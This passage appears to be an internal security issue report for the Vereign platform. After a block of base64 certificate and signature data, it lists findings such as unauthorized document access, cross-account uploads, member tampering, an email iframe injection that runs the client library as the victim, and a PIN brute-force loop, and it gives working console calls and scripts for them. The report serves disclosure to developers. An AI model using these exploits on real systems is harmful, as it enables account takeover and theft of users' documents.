hrQtgqd5bBGokQfwYPNVZW9FwXf/8cd59prEOnqlMbZJ7copgwYO97abhpy2FUoRWtvDjDLLfdiF
QhVY8meDcS/h5mw2aEugew8hnfSEaD5ZcbOf0ZQeMOVxKbIzSeUDAFyRY6BPpGVPuJD6QAXRMW6K
IWiGoF1taKp5G/nzbzJCMIID5zCCAs+gAwIBAgIUF/D27AMqVXm2yuBrlLEMs5BCmLMwDQYJKoZI
hvcNAQELBQAwgY8xCzAJBgNVBAYTAkNIMQwwCgYDVQQIEwNadWcxDDAKBgNVBAcTA1p1ZzETMBEG
A1UEChMKVmVyZWlnbiBBRzEVMBMGA1UECxMMQnVzaW5lc3MgRGVwMTgwNgYDVQQDEy9hMTkwZGUy
ZC02ODgxLTQ1NjAtYjQ1Yy1kMjQ4NWY0ZTI2ZmEtc2VydmVyc2lkZTAeFw0xOTA0MDEyMDAwMDBa
Fw0yNDA0MDIxOTU5NTlaMIGGMYGDMDYGA1UEAxMvYTE5MGRlMmQtNjg4MS00NTYwLWI0NWMtZDI0
ODVmNGUyNmZhLXVzZXJkZXZpY2UwCQYDVQQGEwJDSDAKBgNVBAcTA1p1ZzAKBgNVBAgTA1p1ZzAR
BgNVBAoTClZlcmVpZ24gQUcwEwYDVQQLEwxCdXNpbmVzcyBEZXAwggEiMA0GCSqGSIb3DQEBAQUA
A4IBDwAwggEKAoIBAQCidRey7b2yqdOFsyut1w3WDadSlC34sIM3lD/hdHB//hx3KDJOC1jIxo7R
39xUgWfIGv7jUmSFanGfqvsEl+WTD/qMYE6B5tfcMgLS6DpcI9AKnk8hV1tAjUhzBLBwEUHRhFqF
rYvx+nSzHzAY2aJ+QzV+Ux/W5v7/qN256oxRbp7zJGO958bhlmu4HAn90alR55+URg7vGga4PutD
Bzq+I2SNw8R+tqKWMJHN5vjzj/RHyXodK5vmXPzmt7XoUKed5T329e1eoTtAk6GDEWACb24xfrxY
O7H1h9wEsCbbJ1TwD9cmvRf8Ujdi1G8HcgbZZhyOp183/TderiVpF6eZAgMBAAGjQjBAMA4GA1Ud
DwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBQljgxV1/DWJvMuM72RZkGA/gY9
UTANBgkqhkiG9w0BAQsFAAOCAQEAk65icvhQPopm/o2ujtgOacUL4RbSQdwv72Ug+DTGdI5j+YjD
Tafe0by+kgzgvhB+hz1kUj1gkaK6/WAOoKgEU+fbc1VcQ39b62kXCXE+/fwfuISLuYwvTQbP5Wjk
OmiuHuo2HEcn0q1P0AIJRgV0146JBgVHmFAtd2keRHPAMhFW8YFRx9Iyj3zmIcYXpjIES56cj1Ez
YE72jMzdX5jfTQsl033YKaYo0dlikiBFHl1bIDaV2gvXJkyc4xkCnwgfsvTcE2XubK7vyWiQNHQa
jglc5r9vK/kzvLQIgQjWt2N/ipElVcpWDfXC39qrBrDygqVoY2FCY6T1d+XlKiiIMDCCBHwwggNk
oAMCAQICFQD6wtQhhxzqH2QVuEShYRLiwYqA6jANBgkqhkiG9w0BAQsFADCBjzELMAkGA1UEBhMC
Q0gxDDAKBgNVBAgTA1p1ZzEMMAoGA1UEBxMDWnVnMRMwEQYDVQQKEwpWZXJlaWduIEFHMRUwEwYD
VQQLEwxCdXNpbmVzcyBEZXAxODA2BgNVBAMTL2ExOTBkZTJkLTY4ODEtNDU2MC1iNDVjLWQyNDg1
ZjRlMjZmYS1zZXJ2ZXJzaWRlMB4XDTE5MDQwMTAwMDAwMFoXDTI0MDQyNDIzNTk1OVowgcAxCzAJ
BgNVBAYTAkNIMQwwCgYDVQQIEwNadWcxDDAKBgNVBAcTA1p1ZzETMBEGA1UEChMKVmVyZWlnbiBB
RzEVMBMGA1UECxMMQnVzaW5lc3MgRGVwMUAwPgYDVQQDEzdhMTkwZGUyZC02ODgxLTQ1NjAtYjQ1
Yy1kMjQ4NWY0ZTI2ZmEtc2VydmVyc2lkZS1vbmV0aW1lMScwJQYJKoZIhvcNAQkBDBhhbGV4ZXku
bHVuaW5AdmVyZWlnbi5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDgROeWCo9Z
DkBch4psI2cndPWW4wCmOQEKd8Nd9VchgK7jYEhhq52518okCPmo2dKLXtv2mKi/FpPhZOLyF9xA
XfJP2nyddbhMd2NpfcWPE2vqolQOdX96ZmKX8QPvUNhGOhC47RRr7cxRnu6cvMQRv4sJyXiGCMfd
Mf9ASRIFLLHU3/uteB3VYlit6FcbqCDoZ37LvbbqCqsL5GlJ3ri6M458g/E44MdFjR5SeADQJX6y
ZRcjmyUnesSdcHOpzd3BExHAIHhoFIB0wR+02/GRlQyA469wbyTFGp5HmwIHr5sK4hW3AfF1W0UU
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
qP0pFM98Ig==
--W0RyLiBEYW15YW4gTWl0ZXZd--ck5GzsRpPFPCGD5mmbat8rPQSG0y1wq5GemKV--

Vereign - Authentic Communication`)

5. I can get document which is not shared with me. Method documentGetDocumentByUUID

Steps to reproduce:

1. First user: Add new document e.g. upload some odt file. Get UUID of this file

2. Second user: Run documentGetDocumentByUUID with this uuid. e.g. await lib.documentGetDocumentByUUID("9a35df83-c39b-4fb2-a862-29dc2527087a") in browser's console. *lib should be exposed to window

Result: the second user will get base64 file's content

6. We shall have the same problem as 4. when we try to send email via Gmail SMTP agent. Which means someone can modify the email message content and inject malicious link.

7. I can create document in an account which is not own to me

6a0830a4-630e-4f34-977d-291975a6c760 <- It's a passport id of some another user

lib.documentCreateDocument("/test.odt", "6a0830a4-630e-4f34-977d-291975a6c760", "application/zip")

7.1 I can upload document into account which is not own to me

6a0830a4-630e-4f34-977d-291975a6c760 <- It's a passport id of some another user

d628d848-f6c1-4042-8138-4537288f9aeb <- resource id from prevoius request

await lib.documentPutDocument("6a0830a4-630e-4f34-977d-291975a6c760", "d628d848-f6c1-4042-8138-4537288f9aeb" ,$0.files[0])

Result: {code: "200", data: "", status: "Document created"}

Should be access denied

8. I can add/remove any user to any member via "entityAddMember","entityAddMemberOf", "entityRemoveMember","entityRemoveMemberOf" methods.

9. Some unused VCL methods:

documentGetDocument BE method reads passportuuid and resourceid from response's headers but VCL library doesn't set these headers

documentGetFileInfo BE method reads resourceid from response's headers but VCL library doesn't set it

documentListDocuments BE method reads passportuuid response's headers but VCL library doesn't set it

10. Dashboard doesn't use these methods but noticed that they return exception

hyperledgerGetInfo returns: rpc error: code = Unavailable desc = all SubConns …hyperledger-agent on 127.0.0.11:53: no such host

hyperledgerTransactionsHistory returns: all SubConns are in TransientFailure, latest connection error: connection error: desc = "transport: Error while dialing dial tcp: lookup v0.9-hyperledger-agent on 127.0.0.11:53: no such host

11. Access to user data and work like it was a user

I injected this page via iframe.

A way how to inject https://code.vereign.com/code/vcl/issues/28#note_25235 (4th point in a ticket)

    1) Prepare fake email message, set user email ("To" section), change message id

    2) Paste <iframe src="http://localhost:8000"></iframe> to the email body

    3) Change http://localhost:8000 to the URL where this script will be hosted
        Should be https, if the user works on https

    4) Send an email

    5) Wait until the user opens this email in the Vereign interface

Comments:

I do not have access to user localstorage, but I can work with VCL library which has access.

Change bellow https://alexeylunin.dev.vereign.com to the URL user is working on

So, now I can work from this injected script as a user

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
    <script src="https://alexeylunin.dev.vereign.com/vcl/js/client"></script>
    <script>
        console.log("Injected: setupViamAPI");
      window.setupViamAPI(
        "hackDiv",
        {
          onEvent: () => {}
        },
        "https://alexeylunin.dev.vereign.com/vcl/js/iframe",
        "https://alexeylunin.dev.vereign.com/api/",
        "https://alexeylunin.dev.vereign.com/wopi/",
        "https://alexeylunin.dev.vereign.com"
      ).then(async function(lib) {
        window.lib = lib;
        console.log("Injected: Lib is initialized");

        var identities = await lib.listIdentities();
        console.log("Injected: User identities: ", identities);

        var currentUUID = await lib.getCurrentlyLoggedInUUID();
        console.log("Injected: Current UUID: ", currentUUID.data);

        var entity = await lib.entityGetEntity(currentUUID.data);
        console.log("Injected: Current entity: ", entity);
        console.log("Injected: Also I can send data to somewhere");
      });
    </script>
    <div id="hackDiv"></div>
</body>
</html>

12. Break any pincode to default 0000 in 2-5 minutes by using brute force

We need to get VCL library and set it into the lib variable. Either get lib from debugger in browser console (we have access to user's computer) or inject one more VCL library and work with it (injected iframe script)

In that case we have access to user laptop. Either we can change pincode remotely by using iframe from 11 issue

var key = Object.keys(JSON.parse(localStorage.identities))[0]; // or var identities = await lib.listIdentities(); var key=identities.data[0];
for (let i = 0; i < 10000; i++)
{
	var oldNum = ""+i;
	await lib.changeIdentityPinCode(key, ('0000' + oldNum).substring(oldNum.length), '0000');
    localStorage.attempt = 1
}

removed DevInProgress label

@alexey.lunin Nice catch! We shall think how to fix them. @kalin.canov I think we should a call how to implement fixes for these issues.